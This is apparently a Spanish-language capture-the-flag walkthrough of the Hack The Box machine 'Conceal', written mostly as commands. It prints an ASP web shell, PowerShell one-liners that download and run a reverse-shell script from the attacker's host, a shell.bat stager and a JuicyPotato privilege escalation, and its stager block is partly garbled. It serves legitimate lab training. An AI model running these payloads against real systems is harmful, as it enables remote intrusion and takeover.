Conceal

May 20, 2021
HTB Windows

nmap -A -p- -oA output 10.129.155.64 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA conceal 10.129.155.64

gobuster dir -k -u http://10.129.155.64/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

nmap -sU -O -p- -oA conceal-udp 10.129.155.64

ssh_command.

nmap -sU -p 160-165 10.129.155.64

ssh_command.

nmap -sU -sC —top-ports 20 -oA udp-conceal 10.129.155.64 ssh_command.

ssh_command.

Vemos que snmp-netstat nos despliega algunos puertos tcp abiertos

snmpwalk -v 2c -c public 10.129.155.64

ssh_command.

Vamos a crackstation.net y ponemos la contrasena que parece ser Dudecake1!

ssh_command.

Tratamos de hacer una conexion a la vpn

ike-scan -M 10.129.155.64

ssh_command.

Podemos ver que el Internet Key Exchange o IKE esta encriptado con DES, con un hash de SHA-1. La version de IKE es v1 y no v2.

%any : PSK “Dudecake1!”

ssh_command.

Se introduce la info en /etc/ipsec.conf y /etc/ipsec.conf

ssh_command.

charondebug es para poder troubleshootear la conexion. authby es para el uso de psk auth esp,ike y keychange lo sacamos del ike-scan left y right son las dos maquinas type=transport es para la conexion de un nodo al otro

ssh_command.

ipsec restart

ipsec up conceal

ssh_command.

Me salia este error cuando queria hacer una conexion. Al final tuve que instalar esto:

sudo apt install strongswan strongswan-pki libcharon-extra-plugins libcharon-extauth-plugins libstrongswan-extra-plugins

ssh_command.

nmap -sT -p- —min-rate 10000 -oA alltcp_vpn 10.129.155.64

ssh_command.

nmap -sT -p 21,80,135,139,445 -sC -sV -oA scripts_vpn 10.129.155.64

ssh_command.

nmap -sC -sV -sT -o full 10.129.155.64

ftp 10.129.155.64

ssh_command.

Trate de subir un archivo aspx y me salia un error. Si pude subir un archivo txt y asp

<%response.write CreateObject(“WScript.Shell”).Exec(Request.QueryString(“cmd”)).StdOut.Readall()%>

ssh_command.

curl http://10.129.155.64/upload/cmd.asp?cmd=whoami

ssh_command.

python -m http.server 8888

ssh_command.

nc -lvnp 4444

http://10.129.155.64/upload/cmd.asp?cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http://10.10.14.116:8888/Invoke-PowerShellTcp.ps1%27)

ssh_command.

systeminfo

ssh_command.

whoami /priv

ssh_command.

Como podemos ver que tiene SetImpersonatePrivilege podemos usar JuicyPotato

Creamos un archivo shell.bat

powershell -c iex(new-object
net.webclient).downloadstring(‘http://10.10.14.31/
shell2.ps1’) cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell2.ps1 powershell -c iex(new-object
net.webclient).downloadstring(‘[http://10.10.14.31/](http://10.10.110/
shell2.ps1’) (new-object net.webclient).downloadfile(‘http://10.10.14.110/
shell.bat’, ‘C:\Users\Destitute\Desktop\shell.bat’) nc -lvnp 443

./juicy.exe -p shell.bat -l 1337 -t * -c “{e60687f7-01a1-40aa-86ac-db1cbf673334}”

ssh_command.